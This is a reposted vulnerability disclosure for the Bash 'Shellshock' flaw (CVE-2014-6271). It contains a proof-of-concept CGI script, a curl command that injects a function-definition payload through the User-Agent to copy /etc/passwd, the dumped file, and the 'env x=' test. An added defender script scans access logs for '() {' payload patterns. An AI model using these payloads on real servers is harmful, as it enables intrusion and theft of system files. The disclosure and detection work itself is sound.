Reposted from: http://zone.wooyun.org/content/15392

from:https://www.invisiblethreat.ca/2014/09/cve-2014-6271/ 

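Today a remote command execution vulnerability in Bash's parsing (CVE-2014-6271) was disclosed, affecting the major Linux distributions and Mac OS X. The vulnerability allows arbitrary commands to be executed remotely in any Web CGI environment backed by Bash! Network devices such as routers, bastion hosts and ××× may also be among the hardest hit. WooYun has already found affected cases on the Internet and will keep following up: http://t.cn/RhjFRmc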



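poc.cgi
#!/bin/bash
# CGI test script: returns the process environment as an HTML page.
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
# Request headers reach the script as HTTP_* environment variables
# (User-Agent becomes HTTP_USER_AGENT); env prints them all.
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0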


$ curl -A '() { :; }; /bin/cat /etc/passwd > dumped_file' http://192.168.0.1/poc.cgi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>500 Internal Server Error</title> 
</head><body> 
<h1>Internal Server Error</h1> 
<p>The server encountered an internal error or 
misconfiguration and was unable to complete 
your request.</p> 
<p>Please contact the server administrator, 
webmaster@localhost and inform them of the time the error occurred, 
and anything you might have done that may have 
caused the error.</p> 
<p>More information about this error may be available 
in the server error log.</p> 
<hr> 
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address> 
</body></html>


$ curl http://192.168.0.1/dumped_file 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
Debian-exim:x:101:103::/var/spool/exim4:/bin/false 
statd:x:102:65534::/var/lib/nfs:/bin/false 
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin




 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
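
A defender-side check for the requests shown above, added here as an example and not part of the original post: it scans an Apache combined-format access log for Referer or User-Agent values that begin with "() {" and lists later successful requests from the same client. The log lines and addresses are constructed, and the function names sample_log and scan_log are illustrative.

```shell
#!/bin/sh
# Added example (not from the original post): flag access-log entries whose
# Referer or User-Agent begins with "() {", the prefix bash treats as an
# exported function definition, then list later 200 responses to that client.

# Constructed sample in Apache combined log format; addresses are
# documentation ranges, payload strings are the ones shown on this page.
sample_log() {
cat <<'EOF'
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /poc.cgi HTTP/1.1" 500 612 "-" "() { :; }; /bin/cat /etc/passwd > dumped_file"
198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:02:11 +0000] "GET /dumped_file HTTP/1.1" 200 981 "-" "curl/7.26.0"
198.51.100.9 - - [25/Sep/2014:10:03:40 +0000] "GET /poc.cgi HTTP/1.1" 200 77 "() { :;}; echo vulnerable" "Mozilla/5.0"
EOF
}

# Reads a combined-format log on stdin. Splitting on double quotes gives
# $1 = client/ident/user/time, $2 = request line, $3 = status and size,
# $4 = Referer, $6 = User-Agent. Assumes the logged values contain no
# double quotes of their own.
scan_log() {
    awk -F'"' '
    {
        split($1, head, " "); ip = head[1]
        split($3, resp, " "); status = resp[1]
        hit = 0
        if (index($4, "() {") == 1) { print "HIT", ip, "referer", status; hit = 1 }
        if (index($6, "() {") == 1) { print "HIT", ip, "user-agent", status; hit = 1 }
        # A clean, successful request from an already flagged client may be
        # the retrieval of whatever the injected command wrote.
        if (!hit && (ip in flagged) && status == 200) print "FOLLOWUP", ip, $2
        if (hit) flagged[ip] = 1
    }'
}

sample_log | scan_log
```

A HIT with status 500, as in the curl session above, does not mean the injected command failed; the FOLLOWUP line is the fetch of the file it wrote.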